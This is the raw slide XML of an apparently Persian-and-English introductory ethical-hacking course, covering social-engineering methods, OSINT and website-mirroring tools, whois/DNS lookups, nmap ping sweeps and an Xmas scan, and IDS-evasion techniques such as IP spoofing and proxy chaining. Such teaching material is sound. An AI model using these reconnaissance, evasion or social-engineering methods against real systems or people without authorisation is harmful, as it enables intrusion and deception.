            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>BugCrowd</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Cybrary.it (free)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Opensecuritytraining.info (free)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Offensive-sercurity.com</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Pentesterlab.com</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Eccouncil.org (CEH)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>BOOKS </a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>hackerspaces.org</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>Conferences (DEFCON, Blackhat)</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en"/>
              <a:t>BOOKS BOOKS BOOKS</a:t>
            </a:r>
            <a:endParaRPr b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="789" name="Google Shape;789;p127"/>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افراد و مهندسی اجتماعی</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="164" name="Google Shape;164;p28"/>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اهمیت افراد در امنیت</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>جمع آوری دیتای افراد </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>سایت‌هایی مثل Wink, Intelius, LinkedIn, AnyWho</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>سایت‌های خودلودهی</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>اطلاعات رقبا</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>مهندسی اجتماعی</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>شنود Eavesdropping</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>فیشینگ Phishing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>نگاه دزدکی Shoulder Surfing</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>آشغال‌گردی Dumpster</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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جمع آوری دیتا از یک سایت</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="170" name="Google Shape;170;p29"/>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دیدن سورس سایت ها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>استخراج داده ها با Web Data Extractor (ویندوز)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>میرور کردن با httrack در کالی (webhttrack)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ابزارهای دیگه هم هستن از جمله wget و بقیه چیزها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>نصب و استفاده از metagoofil برای گرفتن فایل‌ها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="457200" marR="0" rtl="1" algn="r">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>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ایمیل</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="176" name="Google Shape;176;p30"/>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اطلاعاتی که ایمیل به ما می دهد</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>هدرها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>لینک و کلیک روی آن </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>لود شدن عکس و اسکریپت و …</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ترکرها</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Email Tracker Pro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اطلاعات ا ز دامین</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="182" name="Google Shape;182;p31"/>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0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>w</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>hois (command, online, applications (smart whois))</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DNS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Concept</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Nslookup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>et type=mx</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="■"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>g</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>oogle.com</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-304800" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1200"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Online tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="91440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Systematic Network Scanning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="188" name="Google Shape;188;p32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="701200" y="200570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Find hosts</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wardialing (ToneLoc, Phonesweep, THC-SCAN)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Wardriving</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ping / hping3</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>oncept</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="2" marL="1371600" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>n</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>map –sP –v</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ping Sweep tools</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>nmap -sn  (sweep network)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Find ports</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Banner Grabbing (Identify OS / Service / Version / …)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Vulnerability Scanning</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1600"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="189" name="Google Shape;189;p32"/>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Document / Network Diagram / Report</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>And… Evade IDS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Change source</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Packet fragmentation</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Spoofing IP</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-292100" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1000"/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Proxy / Daisy chaining</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="1" algn="r">
              <a:spcBef>
                <a:spcPts val="160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اسکن پورت ها</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195" name="Google Shape;195;p33"/>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0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Remind the TCP flow</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Services should be accessible, so you will see them</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>We will get / send RST packet to close. So we can have </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>There are also URG (process immediately) &amp; PSH (send all buffered data immediately) flags</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open wireshark, run nmap -sX ip &amp; check in wireshark with ip.addr == ip</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-226059" lvl="0" marL="365760" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="1600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
